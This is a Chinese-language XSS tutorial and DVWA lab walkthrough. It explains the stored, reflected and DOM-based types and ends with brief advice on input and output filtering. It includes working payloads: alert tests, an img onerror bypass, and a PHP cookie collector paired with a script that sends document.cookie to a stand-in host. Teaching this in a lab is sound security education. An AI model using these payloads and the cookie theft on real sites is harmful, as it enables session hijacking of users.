目录
什么是XSS
概念
理解
XSS分类
存储型XSS
反射型XSS
原理
攻击过程
DOM型
攻击过程
DOM行XSS与反射型XSS区别
存储型XSS与反射型XSS区别
DVWA实验
反射型XSS
low等级
JavaScript弹窗函数
攻击思路
攻击者web设计
medium等级
high等级
impissible等级
存储型XSS
low等级
medium等级
high
impossible等级
修复
什么是XSS
XSS全称是:Cross Site Script ,缩写应该是css,但为了与Css区分开,安全行业就取名为Xss
- 中文名称:跨站脚本
- 常见危害:盗取用户信息,钓鱼,制造蠕虫等。
Xss其实是一种注入,前端语言的注入。
概念
黑客通过“HTML注入”篡改网页,插入恶意脚本,在用户浏览网页时,实现控制用户浏览器的一种攻击方式。
理解
正常情况下我们有一个钥匙,对应着保险柜的门,但是有人偷偷拿到了我们的钥匙,又复制了一把,这样就也能打开保险柜了。
这里的钥匙在web中指的事Cookie,当黑客可以利用Xss盗取用户的 Cookie,黑客有了Cookie就可以以正常用户的身份访问Web站点,对于Web站点来说,他只认Cookie,无法分辨是谁在访问。
XSS分类
- 存储型
- 反射型
- DOM型
存储型XSS
黑客构造XSS脚本在留言上,提交给后端的Web应用程序,Web应用程序将恶意留言保存在数据库中。
用户打开浏览器,访问嵌入了XSS脚本的页面,浏览器向后端的web应用程序请求页面内容。而页面中的留言是存储在数据库中,所以需要从数据库中读取数据,数据库会将写入的XSS代码返回给web应用程序,并最终返回给浏览器,触发XSS。
反射型XSS
访问携带XSS脚本的链接触发XSS
原理
这是后端php语言,获取参数后直接输入到客户端,导致XSS。
攻击过程
用户在浏览器中个访问带有XSS脚本的链接,浏览器向后端Web应用程序发送请求,后端应用程序将URL中XSS脚本数据写入到响应页面,并返回给浏览器,浏览器渲染响应页面,触发XSS。
DOM型
特征与反射型XSS是一样的,区别在于
可以看到触发的地方在url的hash中
Location 对象 Location 对象包含有关当前 URL 的信息。 Location 对象是 Window 对象的一个部分,可通过 window.location 属性来访问。 Location 对象属性 属性 描述 hash 设置或返回从井号 (#) 开始的 URL(锚)。
查看源码,可以看到,上面一句是从URl中提取hash赋值给变量errorMsg。第二句是对errorMsg进行编码后,以innerHTML的形式写入ID为“errorMsg”的DOM节点中。
攻击过程
用户在浏览器中访问带XSS脚本的链接,浏览器通过JS语言从URl中提取出XSS脚本内容,并写入到DOM中,触发XSS。
DOM行XSS与反射型XSS区别
- DOM型XSS是通过前端JS语言将XSS脚本写入DOM触发XSS。
- 反射型XSS是通过后端Web应用程序,将XSS脚本写入到响应页面中,浏览器渲染响应页面,这才触发XSS。
存储型XSS与反射型XSS区别
区别在于存储型xss是在数据库中提取XSS脚本内容,而反射型XSS是直接从URL中提取XSS脚本内容。
DVWA实验
xss本质上是一种客户端代码注入,通常注入代码是JavaScript。区别于命令注入,SQL注入等服务端代码注入。
三种XSS区别
反射型XSS
进入DVWA,打开反射型XSS,一个简单输入框。
low等级
首先进行正常操作,输入xss,点击提交
页面出现字符
输入xss标签,打开firebug发现似乎可以注入html标签
接下来进行弹窗测试,这是xss测试普遍的方法,能弹窗说明存在xss
<script>alert(/xss/)</script>
在firebug中可以查看到对应元素,成功注入了js脚本,说明这里存在xss漏洞
JavaScript弹窗函数
js中不仅仅只有alert()可以弹窗,我们可以根据服务器的过滤情况,尝试其他函数
攻击思路
反射型xss,有以下四个角色,首先用户处于登录状态,攻击者发送一个url给用户,这个url域名是被攻击的web服务器,诱骗他点击,用户点击后web会对url中包含的js脚本做出响应,用户浏览器执行js脚本。在用户不知情的情况下,发送用户凭证到攻击者的web服务器上,攻击者获取到会话信息,攻击者使用用户的身份登录到被攻击的web服务器。到这里攻击者就可以以用户的身份操作。
攻击者web设计
我们使用127.0.0.1这个ip新建一个cookie.php文件内容如下
<?php
$cookie = $_GET['cookie'];//将偷取到的cookie存储到cookie变量
file_put_contents('cookie.txt',$cookie);//将变量输出到cookie.txt中
?>
构造攻击js
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
document.location含义是将页面内容定位到指定位置,会访问参数中的地址,参数中写上刚刚新建的php文件网址,将document.cookie获取的cookie赋值给cookie参数。这个cookie值最终会出现在127.0.0.1网站的cookie.txt中
构造并发送攻击url
hello后面的数据使我们输入的数据,除了单引号全部被html编码了
我们查看源码,使用了htmlspecialchars函数
这个函数单引号默认不编码,需要的话要设置如图参数
存储型XSS
low等级
前端限制,限制长度
我们使用firebug查看,限制了30和50个字符
我们可以使用TamperData绕过前端,直接发送,输入一百个字符,发送后发现成功绕过浏览器限制
进行插入弹框脚本,发现弹了两次,name和message成功注入,其他与反射型基本一致,因为存储型是存到数据库中的,会一直存在
清除弹窗,重置数据库
medium等级
使用大小写混合,成功注入,发现只有name注入成功,但是只要有一个弹窗成功就说明存在xss
high
使用img
<img src=x onerror=alert(1)>成功绕过
发现name注入成功
impossible等级
发现单引号被转义,其他符号被过滤
修复
输入过滤与输出过滤
输入过滤最好使用白名单
输出过滤——html编码js转义
